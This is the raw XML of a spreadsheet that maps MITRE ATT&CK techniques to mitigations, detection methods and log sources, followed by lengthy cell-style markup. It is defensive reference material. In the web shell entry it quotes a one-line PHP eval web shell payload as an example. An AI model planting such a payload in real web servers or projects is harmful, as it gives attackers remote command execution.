    <t>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only  authorized administrators can create new services.
Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1034</t>
  </si>
  <si>
    <t>Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them[[CiteRef::Microsoft CreateProcess]]. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate[[CiteRef::MSDN DLL Security]].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configurations[[CiteRef::Kanthak Sentinel]]. 
Require that all executables be placed in write-protected directories.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Identify and block potentially malicious software that may be executed through the path interception by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies,[[CiteRef::Corio 2008]] that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>* Monitor process API calls to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mechanism[[CiteRef::TechNet Autoruns]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1013</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by processes running under SYSTEM permissions.</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1058</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</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</si>
  <si>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payload:[[CiteRef::Lee 2013]]
&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. 4688 may be used to detect Web servers that perform suspicious actions such as running [[Software/S0106|cmd]]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network.[[CiteRef::US-CERT Alert TA15-314A Web Shells]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1100</t>
  </si>
  <si>
    <t>Ensure that externally facing Web servers are patched regularly to prevent adversary access through [[T1068|Exploitation for Privilege Escalation]] to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. 
Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through [[Credential Access]] and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network.[[CiteRef::US-CERT Alert TA15-314A Web Shells]]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</si>
  <si>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[[T1055|Process Injection]] for attempts to hide execution or evidence of [[Discovery]].
Higher privileges are often necessary to perform additional actions such as some methods of [[T1003|Credential Dumping]]. Look for additional activity that may indicate an adversary has gained higher privileges. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1068</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</si>
  <si>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if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.[[CiteRef::TechNet Moving Beyond EMET]] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[[CiteRef::Wikipedia Control Flow Integrity]] Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.</t>
  </si>
  <si>
    <t>Examine data in user?s SID-History attributes using the PowerShell Get-ADUser Cmdlet[[CiteRef::Microsoft Get-ADUser]], especially users who have SID-History values from the same domain.[[CiteRef::AdSecurity SID History Sept 2015]]
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History.[[CiteRef::AdSecurity SID History Sept 2015]] [[CiteRef::Microsoft DsAddSidHistory]]
Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function.[[CiteRef::Microsoft DsAddSidHistory]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1178</t>
  </si>
  <si>
    <t>Clean up SID-History attributes after legitimate account migration is complete.
Apply SID Filtering to domain trusts to exclude SID-History from requests to access domain resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller). Domain SID Filtering is disabled by default.
Apply SID Filtering to forest trusts to exclude SID-History from request to access forest resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /EnableSIDHistory:no&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller). Forest SID Filtering is active by default, but may block child domains from transitively accessesing the forest trust.
Ensure SID Filter Quarantining is enabled on trusted external domains (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller) to ensure authentication requests only include SIDs from that domain. SID Filter Quarantining is automatically enabled on all created external trusts using Server 2003 or later domain controllers.[[CiteRef::Microsoft Trust Considerations Nov 2014]][[CiteRef::Microsoft SID Filtering Quarantining Jan 2009]]</t>
  </si>
  <si>
    <t>LMD</t>
  </si>
  <si>
    <t>Rating</t>
  </si>
  <si>
    <t xml:space="preserve">Formula for color - =ISNUMBER(SEARCH("3",Details!$U$4)) - </t>
  </si>
  <si>
    <t>Based On Log Mgmt</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Counts</t>
  </si>
  <si>
    <t>Sysmon - Dll</t>
  </si>
  <si>
    <t>LOG-MD
(non-log)</t>
  </si>
  <si>
    <t xml:space="preserve">
Logs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</si>
</sst>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b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="22"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0B0080"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Courier New"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="7.5"/>
      <color rgb="FF0B0080"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="19.8"/>
      <color rgb="FF000000"/>
      <name val="Georgia"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF252525"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="13.2"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="24"/>
      <color theme="1"/>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
      <sz val="11"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF0070C0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="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9F9F9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F2F2"/>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74">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>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style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right/>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="double">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="medium">
        <color rgb="FFAAAAAA"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>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AAAAAA"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color rgb="FFAAAAAA"/>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rgb="FFAAAAAA"/>
      </left>
      <right style="medium">
        <color rgb="FFAAAAAA"/>
      </right>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFAAAAAA"/>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06">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="3" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="4" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>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10" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" readingOrder="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="5" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="10" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="11" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="12" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="16" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="0"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3" fillId="4" borderId="19" xfId="1"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13" fillId="4" borderId="28" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="29" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="30" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="30"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12" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="30" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="33" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>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14" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="3" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="9" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="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xf>
    <xf numFmtId="0" fontId="18" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="10" borderId="0" xfId="0" applyFont="1"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0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="18" fillId="11" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1"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12" borderId="42" xfId="0"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center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="4" borderId="52" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="4" borderId="53" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="19" fillId="4" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="48" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="58"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0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="64" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="56" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="65" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="7"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11" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="48" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="50" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="22" fillId="13" borderId="64" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="22" fillId="13" borderId="56" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="22" fillId="13" borderId="65" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="5" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
